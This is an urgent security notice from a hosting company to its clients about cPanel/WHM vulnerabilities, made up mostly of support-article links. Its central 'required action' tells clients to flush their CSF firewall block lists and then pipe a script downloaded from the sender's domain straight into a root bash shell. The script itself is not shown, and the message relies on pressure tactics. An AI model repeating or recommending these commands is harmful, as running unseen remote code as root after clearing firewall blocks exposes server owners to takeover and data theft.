URGENT SECURITY NOTICE โ€” Immediate Action Required for cPanel/WHM Servers

Friday, May 15, 2026

๐Ÿšจ CRITICAL SECURITY ALERT โ€“ IMMEDIATE ACTION REQUIRED ๐Ÿšจ

Severity Level: CRITICAL
Risk Score: 9.9 / 10

Dear Valued Client,

We are issuing an urgent security advisory regarding multiple critical vulnerabilities in cPanel/WHM, along with active exploitation attempts observed globally across hosting environments.

Failure to act immediately may result in unauthorized access, data compromise, or full server takeover.


๐Ÿ”Ž Recent Security References (May 13, 2026)

https://support.cpanel.net/hc/en-us/articles/40437313190295-Security-CVE-2026-32993-cPanel-WHM-WP2-Security-Update-May-13-2026
https://support.cpanel.net/hc/en-us/articles/40437241987607-Security-CVE-2026-32992-cPanel-WHM-WP2-Security-Update-May-13-2026
https://support.cpanel.net/hc/en-us/articles/40437254183959-Security-CVE-2026-32991-cPanel-WHM-WP2-Security-Update-May-13-2026
https://support.cpanel.net/hc/en-us/articles/40437213099159-Security-CVE-2026-29206-cPanel-WHM-WP2-Security-Update-May-13-2026
https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026

โš ๏ธ Kernel Vulnerability

https://support.cpanel.net/hc/en-us/articles/40313772552727-Dirty-Frag-vulnerability-reported-for-Linux-kernel


๐Ÿ“… Includes May 8 Security Updates

https://support.cpanel.net/hc/en-us/articles/40311543760407-Security-CVE-2026-29203-cPanel-WHM-WP2-Security-Update-May-08-2026
https://support.cpanel.net/hc/en-us/articles/40311426610327-Security-CVE-2026-29202-cPanel-WHM-WP2-Security-Update-May-08-2026
https://support.cpanel.net/hc/en-us/articles/40311033698327-Security-CVE-2026-29201-cPanel-WHM-WP2-Security-Update-May-08-2026


๐Ÿšจ ZERO-DAY ALERT (April 28, 2026)

https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026


โšก REQUIRED ACTION โ€“ EXECUTE IMMEDIATELY

Login to your WHM Panel โ†’ Terminal, then run:

โœ… For CloudLinux / AlmaLinux (8 / 9 / 10) ... THIS IS FOR MAJORITY

csf -df; csf -tf; bash <(curl https://hostseo.uk/update/update.sh) update.sh;

๐Ÿ” ALTERNATIVE SERVER TYPES

๐Ÿ”น RockyLinux (8 / 9)

csf -df; csf -tf; bash <(curl https://hostseo.uk/update/update-rocky.sh) update-rocky.sh;

๐Ÿ”น CentOS 7 (cPanel 110.x legacy)

csf -df; csf -tf; bash <(curl https://hostseo.uk/update/update-centos.sh) update-centos.sh;

โ„น๏ธ IMPORTANT NOTES

  • โณ The cleanup & verification process may take up to 2 hours
  • โš™๏ธ Temporary high server load is expected during execution
  • ๐Ÿ” If WHM becomes inaccessible after completion, contact support immediately

๐Ÿ›ก๏ธ STRONGLY RECOMMENDED

To ensure full protection, please also:

  • โœ… Update cPanel/WHM to the latest stable version
  • ๐Ÿ” Review all administrator & reseller accounts
  • ๐Ÿ”‘ Change root and user passwords
  • ๐Ÿ“œ Audit SSH access logs
  • ๐Ÿงช Run a full malware + integrity scan

โš ๏ธ FINAL WARNING

These vulnerabilities are being actively exploited in the wild.
Delaying action significantly increases the risk of server compromise.


Thank you for your immediate attention.

Security Operations Team
Zelt Global Ventures FZC LLC
https://www.zelt.ae

Sister Concern of HOSTSEO | CENTRIOHOST

« Back